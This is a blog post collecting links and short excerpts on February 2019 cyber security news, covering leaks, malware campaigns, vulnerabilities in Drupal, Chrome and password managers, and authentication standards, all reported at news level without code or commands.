Cyber Security News February 2019

This posting is here to collect cyber security news in February 2019.

I post links to security vulnerability news to comments of this article.

If you are interested in cyber security trends, read my Cyber security trends 2019 posting.

You are also free to post related links.

 

373 Comments

  1. Tomi Engdahl says:

    Research
    ATM robber WinPot: a slot machine instead of cutlets
    https://securelist.com/atm-robber-winpot/89611/

    Reply
  2. Tomi Engdahl says:

    LPG Gas Company Leaked Details, Aadhaar Numbers of 6.7 Million Indian Customers
    https://thehackernews.com/2019/02/indane-aadhaar-leak.html

    Reply
  3. Tomi Engdahl says:

    Security
    Password managers may leave your online crown jewels ‘exposed in RAM’ to malware – but hey, they’re still better than the alternative
    The alternative being memorizing a load of really long unique passphrases
    https://www.theregister.co.uk/2019/02/20/password_managers_security_bugs/

    A bunch of infosec bods are taking some of the most popular password managers to task after an audit revealed some mildly annoying, non-world-ending security shortcomings.

    Researchers at ISE declared on Tuesday that the likes of 1Password, KeePass, LastPass, and Dashline all have vulnerabilities that would potentially allow malicious software on a Windows machine to steal either the master password or individual passwords stored by the applications.

    The problem here is mainly secure memory management. To some degree, every one of the four password managers left passwords – either the master password or individual credentials – accessible in memory.

    Password Managers: Under the Hood of Secrets Management
    https://www.securityevaluators.com/casestudies/password-manager-hacking/

    Reply
  4. Tomi Engdahl says:

    Why hackers love mainframe passwords – and what to do about it
    https://www.itproportal.com/features/why-hackers-love-mainframe-passwords-and-what-to-do-about-it/

    Why are IBM’s mainframe customers seemingly reluctant to upgrade their security by incorporating multi-factor authentication?

    Reply
  5. Tomi Engdahl says:

    A malicious USB cable with its own wifi rig
    https://boingboing.net/2019/02/19/o-mg.html

    MG has built a proof-of-concept malicious USB cable with a tiny wifi radio hidden inside of it, able to wirelessly exfilatrate stolen data; he calls it the O. MG, and while the prototype cost him $4k and took 300 hours, he’s working with a team on a small production run for other security researchers to play with.

    Reply
  6. Tomi Engdahl says:

    Private Mossad for Hire
    Inside an effort to influence American elections, starting with one small-town race.
    https://www.newyorker.com/magazine/2019/02/18/private-mossad-for-hire

    Reply
  7. Tomi Engdahl says:

    Black-hat sextortionists required: Competitive salary and dental plan
    Cybercrims aren’t just raking it in – they’re dishing it out too
    https://www.theregister.co.uk/2019/02/21/black_hats_sextortion_275k_salaries_helpers/

    Extortionists are promising salaries of more than a quarter of a million pounds to skilled infosec folk willing to put on a black hat, according to research outfit Digital Shadows.

    Reply
  8. Tomi Engdahl says:

    China Uses DNA to Track Its People, With the Help of American Expertise
    https://www.nytimes.com/2019/02/21/business/china-xinjiang-uighur-dna-thermo-fisher.html

    The Chinese authorities turned to a Massachusetts company and a prominent Yale researcher as they built an enormous system of surveillance and control.

    Reply
  9. Tomi Engdahl says:

    Fool ML once, shame on you. Fool ML twice, shame on… the AI dev? If you can hoodwink one model, you may be able to trick many more
    Some tips on how to avoid miscreants deceiving your code
    https://www.theregister.co.uk/2019/02/21/ai_attack_transfer/

    Adversarial attacks that trick one machine-learning model can potentially be used to fool other so-called artificially intelligent systems, according to a new study.

    It’s hoped the research will inform and persuade AI developers to make their smart software more robust against these transferable attacks, preventing malicious images, text, or audio that hoodwinks one trained model from tricking another similar model.

    Reply
  10. Tomi Engdahl says:

    Russia bans smartphones for soldiers over social media fears
    https://www.bbc.com/news/world-europe-47302938

    Russia’s parliament has voted to ban soldiers from using smartphones while on duty, after their social media use raised issues of national security.

    The bill forbids military personnel from using a phone with the ability to take pictures, record videos and access the internet.

    Soldiers also cannot write about the military or talk to journalists.

    Reply
  11. Tomi Engdahl says:

    Researcher: Not Hard for a Hacker to Capsize a Ship at Sea
    https://threatpost.com/hacker-capsize-ship-sea/142077/

    Capsizing a ship with a cyberattack is a relatively low-skill enterprise, according to an analysis from Pen Test Partners.

    With so many previously outlined ways to infiltrate networks on-board shipping vessels (think satcom hacking, phishing, USB attacks, insecure crew Wi-Fi, etc.), the question becomes, what could an adversary do with that access?

    “If one was suitably motivated, perhaps by a nation-state or a crime syndicate, one could bring about the sinking of a ship,” said Pen Test Partners researcher Ken Munro, in a stark assessment of maritime cyber-danger this week.

    Reply
  12. Tomi Engdahl says:

    Bored bloke takes control of British Army ‘psyops’ unit’s Twitter
    Great recruiting tool there, folks
    https://www.theregister.co.uk/2019/02/21/77_brigade_twitter_account_hacked/

    Reply
  13. Tomi Engdahl says:

    Drupal RCE Flaw Exploited in Attacks Days After Patch
    https://www.securityweek.com/drupal-rce-flaw-exploited-attacks-days-after-patch

    The flaw, tracked as CVE-2019-6340, is caused by the lack of proper data sanitization in some field types and it can allow an attacker to execute arbitrary PHP code. Exploitation is possible if the core RESTful Web Services module is enabled and it allows PATCH or POST requests. Attacks are also possible if another web services module is enabled, such as JSON:API in Drupal 8 or RESTful Web Services or Services in Drupal 7.

    Reply
  14. Tomi Engdahl says:

    China’s Telecom Dominance a Security Challenge: UK’s GCHQ
    https://www.securityweek.com/chinas-telecom-dominance-security-challenge-uks-gchq

    China’s global dominance in telecommunications networks could pose security threats for decades, Britain’s cybersecurity chief warned in a speech in Singapore on Monday.

    As countries move to roll out ultra-fast fifth-generation — 5G — mobile networks, concerns are mounting that Beijing could use hardware provided by Chinese firms to spy on Western governments.

    “The strategic challenge of China’s place in the era of globalised technology is much bigger than just one telecommunications equipment company… it’s a first order strategic challenge for us all,” the head of Britain’s GCHQ cybersecurity agency Jeremy Fleming said.

    “It’s a hugely complex strategic challenge which will span the next few decades… How we deal with it will be crucial for prosperity and security way beyond 5G contracts.”

    In the last year, the United States has stepped up pressure on its allies to block Chinese telecoms giant Huawei from building their 5G networks, citing security concerns.

    https://www.securityweek.com/us-urging-allies-shun-huawei-wsj

    Reply
  15. Tomi Engdahl says:

    Mozilla May Reject UAE Firm’s Root Inclusion Request
    https://www.securityweek.com/mozilla-may-reject-uae-firms-root-inclusion-request

    Mozilla is considering rejecting a request by United Arab Emirates-based DarkMatter to be accepted as a top-level certificate authority in Mozilla’s root certificate program.

    In December 2017, the UAE organization asked Mozilla to add its root to Mozilla products, and the request entered the review process soon after. DarkMatter is a subordinate certificate authority (CA) under QuoVadis, now part of DigiCert (which also acquired Symantec’s CA business).

    Reply
  16. Tomi Engdahl says:

    Support for FIDO2 Passwordless Authentication Added to Android
    https://www.securityweek.com/support-fido2-passwordless-authentication-added-android

    Google and FIDO Alliance on Monday announced that it is now easier for developers to provide passwordless authentication features for their Android websites and apps as a result of Android becoming FIDO2 Certified.

    The FIDO2 Project comprises the W3C’s Web Authentication (WebAuthn) specification, which provides a standard web API that enables online services to use FIDO authentication, and the Client-to-Authenticator Protocol (CTAP), which enables devices such as FIDO security keys and smartphones to serve as authenticators via WebAuthn.

    Now that Android has become FIDO2 Certified, it will be easier for developer to enable users to log into apps and websites using their Android device’s built-in fingerprint sensor and/or FIDO security keys.

    The FIDO2 certification has been granted to devices running Android 7 and later. New devices will be certified out of the box, while existing devices will include FIDO2 support after an automated Google Play Services update. Since a Google Play Services update is used to roll out FIDO2 support, users will not have to wait on their device’s manufacturer to benefit from passwordless authentication capabilities.

    The use of FIDO authentication, which can be implemented by developers via a simple API call, increases protection against phishing, man-in-the-middle (MitM) and other types of attacks.

    Reply
  17. Tomi Engdahl says:

    Hacker puts up for sale third round of hacked databases on the Dark Web
    https://www.zdnet.com/article/hacker-puts-up-for-sale-third-round-of-hacked-databases-on-the-dark-web/

    Hacker is selling 93 million user records from eight companies, including GfyCat.

    Reply
  18. Tomi Engdahl says:

    ICANN Calls for Full DNSSEC Deployment, Promotes Community Collaboration to Protect the Internet
    https://www.icann.org/news/announcement-2019-02-22-en

    The Internet Corporation for Assigned Names and Numbers (ICANN) believes that there is an ongoing and significant risk to key parts of the Domain Name System (DNS) infrastructure.

    In the context of increasing reports of malicious activity targeting the DNS infrastructure, ICANN is calling for full deployment of the Domain Name System Security Extensions (DNSSEC) across all unsecured domain names. The organization also reaffirms its commitment to engage in collaborative efforts to ensure the security, stability and resiliency of the Internet’s global identifier systems.

    Reply
  19. Tomi Engdahl says:

    B0r0nt0K Ransomware Wants $75,000 Ransom, Infects Linux Servers
    https://www.bleepingcomputer.com/news/security/b0r0nt0k-ransomware-wants-75-000-ransom-infects-linux-servers/

    A new ransomware called B0r0nt0K is encrypting victim’s web sites and demanding a 20 bitcoin, or approximately $75,000, ransom. This ransomware is known to infect Linux servers, but may also be able to encrypt users running Windows.

    When examining the source code for the payment site, BleepingComputer noticed the “Vietnamese Hacker” embedded comment. While this could indicate that the developer is Vietnamese, this is by no means proof.

    Reply
  20. Tomi Engdahl says:

    Zack Whittaker / TechCrunch:
    Cloudflare expands its government warrant canaries, claiming it’s never handed over its SSL keys or customers’ SSL keys, as many firms abandon their canaries — When the government comes for your data, tech companies can’t always tell you. But thanks to a legal loophole, companies can say if they haven’t had a visit yet

    Cloudflare expands its government warrant canaries
    https://techcrunch.com/2019/02/26/cloudflare-warrant-canary/

    Reply
  21. Tomi Engdahl says:

    Hackers can hijack bare-metal cloud servers by corrupting their BMC firmware
    https://www.zdnet.com/article/hackers-can-hijack-bare-metal-cloud-servers-by-corrupting-their-bmc-firmware/

    Cloud providers are failing to wipe bare-metal servers clean when re-assigning them to new clients.

    Reply
  22. Tomi Engdahl says:

    We Need More Phishing Sites on HTTPS!
    https://www.venafi.com/blog/we-need-more-phishing-sites-https?utm_source=socialmedia&utm_medium=Bora&utm_campaign=Helme-phishing-HTTPS-blog

    There, I said it! It might sound like a weird thing to stay but stick with me on this one. We really do need more phishing sites on HTTPS, all of them, encrypt all the things, and not for the reason you might think.

    The web is going HTTPS

    If we want the whole web to be on HTTPS, which we do, then we need to remove the barriers to going HTTPS, mainly financial and technical barriers. Let’s Encrypt managed to do both of those things

    The HTTPS phishing thing

    There’s been a lot of noise in the industry recently about Let’s Encrypt issuing certs to domains being used for phishing.

    The CA needs to prove you own a domain and they issue a cert.

    Up until last year COMODO were issuing a lot more phishing certs than Let’s Encrypt

    Let’s Encrypt log all of their certs, where, right now, COMODO don’t. When we get to April and CT logging becomes mandatory and not optional as it is now

    If we want a 100% encrypted web then we need to encrypt all sites, despite whether or not you agree with what they do/say/sell/etc… 100% is 100% and it includes the ‘bad guys’ too.

    there is another reason we want phishing sites on HTTPS and it’s actually so we can find them and shut them down faster.

    Certificate Transparency

    any certificate that a CA issue has to be placed into a public log for the whole world to see. Just think about that for a second. Right now when someone registers a domain, we don’t know. When they setup a domain in DNS, we don’t know. When they go phishing on HTTP, we don’t know. But now, when they get a certificate, we’ve got them! The CT logs are an awesome way to monitor for new phishing sites coming into existence by watching for them issuing new certificates!

    Once it comes online, you can see it’s obviously a phishing site and you head over and submit it to SafeBrowsing. You can have it reported and blocked before the phishers have even had chance to send out their first round of emails.

    SafeBrowsing is already a proven and reliable method to neutralise phishing sites when they pop up. Finding phishing certs and then asking the CA to revoke them is also a fairly pointless exercise because revocation is broken and of course there’s the obvious possibility of abuse for such a system too.

    people seem generally quite happy for the domain registrar to sell the domain and for the DNS providers to resolve the domain and for the browsers to then render the domain, but if a CA issues a certificate for it then there’s uproar. Personally I don’t quite understand the focus on cert issuance for phishing domains and think there are far better places to focus our efforts

    Reply
  23. Tomi Engdahl says:

    Russian Bears Need Less Than 20 Minutes To Hack Your Data
    https://www.forbes.com/sites/daveywinder/2019/02/19/how-the-speed-of-russian-bears-can-help-your-business-understand-the-1-10-60-rule/#44815f9d7131

    Russian bears lead the way when it comes to gaining enough of a foothold in your networks to perform a successful data breach according to the 2019 Global Threat Report from CrowdStrike. This matters, because having an understanding of how quickly the bad guys can move across your networks is vital in getting to grips with the 1-10-60 rule. And that determines how likely you are to stop them succeeding in breaching your data

    Reply
  24. Tomi Engdahl says:

    Close Enough
    https://slate.com/technology/2019/02/reverse-location-search-warrants-google-police.html

    Police departments are using “reverse location search warrants” to force Google to hand over data on anyone near a crime scene.

    Reply
  25. Tomi Engdahl says:

    Who needs malware? IBM says most hackers just PowerShell through boxes now, leaving little in the way of footprints
    https://www.theregister.co.uk/2019/02/26/malware_ibm_powershell/

    Direct-to-memory attacks now account for 57 per cent of hacks, apparently

    A company’s internal network, once compromised, is now more likely to be ransacked by automated scripts than a piece of malware.

    Reply
  26. Tomi Engdahl says:

    The Feds’ Favorite iPhone Hacking Tool Is Selling On eBay For $100—And It’s Leaking Data
    https://www.forbes.com/sites/thomasbrewster/2019/02/27/the-feds-favorite-iphone-hacking-tool-is-selling-on-ebay-for-100and-its-leaking-data/#745e64185dd4

    When eBay merchant Mr. Balaj was looking through a pile of hi-fi junk at an auction in the U.K., he came across an odd-looking device. Easily mistaken for a child’s tablet, it had the word “Cellebrite” written on it. To Mr. Balaj, it appeared to be a worthless piece of electronic flotsam, so he left it in his garage to gather dust for eight months.

    But recently he’s learned just what he had his hands on: a valuable, Israeli-made piece of technology called the Cellebrite UFED. It’s used by police around the world to break open iPhones, Androids and other modern mobiles to extract data.

    Reply
  27. Tomi Engdahl says:

    Network Tallahassee Internet provider hacked, pays ransom to get back online
    https://eu.tallahassee.com/story/news/money/2019/02/26/network-tallahassee-internet-provided-hacked-pays-ransom-get-back-online/2991190002/

    Hackers attacked a Tallahassee-based broadband provider and demanded $6,000 ransom to get its operations back online.

    Reply
  28. Tomi Engdahl says:

    Dow Jones’ watchlist of 2.4 million high-risk individuals has leaked
    https://techcrunch.com/2019/02/27/dow-jones-watchlist-leak/

    A watchlist of risky individuals and corporate entities owned by Dow Jones has been exposed, after a company with access to the database left it on a server without a password.

    Bob Diachenko, an independent security researcher, found the Amazon Web Services-hosted Elasticsearch database exposing more than 2.4 million records of individuals or business entities.

    Reply
  29. Tomi Engdahl says:

    It seems that the watchlist of risky individuals and corporate entities owned by Dow Jones has been exposed, after a company with access to the database left it on a server without a password.

    Dow Jones Risk Screening Watchlist Exposed Publicly
    https://securitydiscovery.com/dow-jones-risk-screening-watchlist-exposed-publicly/

    “copy of the Dow Jones Watchlist dataset, sitting on a public Elasticsearch cluster 4.4GB in size and available for public access to anyone who knew where to look (hint: any public IoT search engine, such as BinaryEdge).”

    Dow Jones’ watchlist of 2.4 million high-risk individuals has leaked
    https://techcrunch.com/2019/02/27/dow-jones-watchlist-leak/

    This unsecured databases made accudentally publicly accessile seems to become a business failure trend for 2019.

    Reply
  30. Tomi Engdahl says:

    Operator of eight DDoS-for-hire services pleads guilty
    https://www.zdnet.com/article/operator-of-eight-ddos-for-hire-services-pleads-guilty/

    Investigators tracked him down after he logged into his rented servers using his home IP addresses.

    Reply
  31. Tomi Engdahl says:

    Google Chrome zero-day used in the wild to collect user data via PDF files
    https://www.zdnet.com/article/google-chrome-zero-day-used-in-the-wild-to-collect-user-data-via-pdf-files/

    Updated: Google is preparing a patch for late April 2019. Some of the suspicious PDF files exploiting this bug don’t appear to be malicious in nature.

    Reply
  32. Tomi Engdahl says:

    Intel SGX Card expands SGX security protections to cloud data centers
    Intel announces new Intel SGX Card line.
    https://www.zdnet.com/article/intel-sgx-card-expands-sgx-security-protections-to-cloud-data-centers/

    ntel announced today Intel SGX Card, a new product to expand its SGX security feature to existing data center server infrastructure that wouldn’t have been able to benefit from it due to hardware architectural limitations.

    Intel SGX stands for Software Guard eXtensions, a feature found in modern Intel CPUs that allows developers to isolate parts of applications inside secure “enclaves.”

    Reply
  33. Tomi Engdahl says:

    Targeted malware attacks against Elasticsearch servers surge
    Old vulnerabilities are proving to be successful.
    https://www.zdnet.com/article/targeted-malware-attacks-against-elasticsearch-clusters-surge/

    Unsecured Elasticsearch clusters are being targeted in a fresh wave of attacks designed to drop both malware and cryptocurrency mining software.

    This week, cybersecurity researchers from Cisco Talos warned of a spike in recent strikes against these systems, with six separate cyberattack groups believed to be involved.

    “The bash script utilized by the attacker follows a commonly observed pattern of disabling security protections and killing a variety of other malicious processes (primarily other mining malware), before placing its RSA key in the authorized_keys file,” the researchers say. “Additionally, this bash script serves to download illicit miners and their configuration files. The script achieves persistence by installing shell scripts as cron jobs.”

    Reply
  34. Tomi Engdahl says:

    New Attack Runs Code After Closing Browser Tab
    https://www.securityweek.com/new-attack-runs-code-after-closing-browser-tab

    A group of researchers has discovered that websites can abuse modern browser APIs to persistently abuse browser resources for nefarious operations even after their tabs or windows have been closed.

    In a paper (PDF) detailing the attack, the researchers explain that MarioNet relies solely on already available HTML5 APIs and that it does not require the installation of additional software. This also means that it can be used on all major browsers.

    The attack is both persistent and stealthy, as it continues in the background of the browser even after the user closes the window or tab of the malicious website. However, it cannot survive browser reboots.

    https://www.ndss-symposium.org/wp-content/uploads/2019/02/ndss2019_01B-2_Papadopoulos_paper.pdf

    Reply
  35. Tomi Engdahl says:

    NVIDIA Patches High Risk Vulnerabilities in GPU Display Drivers
    https://www.securityweek.com/nvidia-patches-high-risk-vulnerabilities-gpu-display-drivers

    NVIDIA has released a security update for the NVIDIA GPU display driver, to address several High severity vulnerabilities impacting GeForce, Quadro, NVS, and Tesla products.

    Reply
  36. Tomi Engdahl says:

    New Attacks Show Signed PDF Documents Cannot Be Trusted
    https://www.securityweek.com/new-attacks-show-signed-pdf-documents-cannot-be-trusted

    Many popular PDF viewers and online validation services contain vulnerabilities that can be exploited to make unauthorized changes to signed PDF documents without invalidating their signature, researchers have warned.

    Reply
  37. Tomi Engdahl says:

    Russia’s Ex-Cybersecurity Chief Gets 22-Year Sentence in Jail
    https://www.securityweek.com/russias-ex-cybersecurity-chief-gets-22-year-sentence-jail

    A Russian military court convicted a former senior counterintelligence officer and a cybersecurity firm executive of treason Tuesday, concluding a case that initially aroused speculation of a manufactured effort to punish the source of leaks about Russian campaign hacking.

    Moscow’s District Military Court heard several months of evidence and arguments behind closed doors before it found Col. Sergei Mikhailov, an ex-officer at Russia’s Federal Security Service (FSB), and Kaspersky Lab executive Ruslan Stoyanov guilty.

    The basis for the charges remains murky given the top-secret nature of the criminal proceedings.

    Reply

Leave a Comment

Your email address will not be published. Required fields are marked *

*

*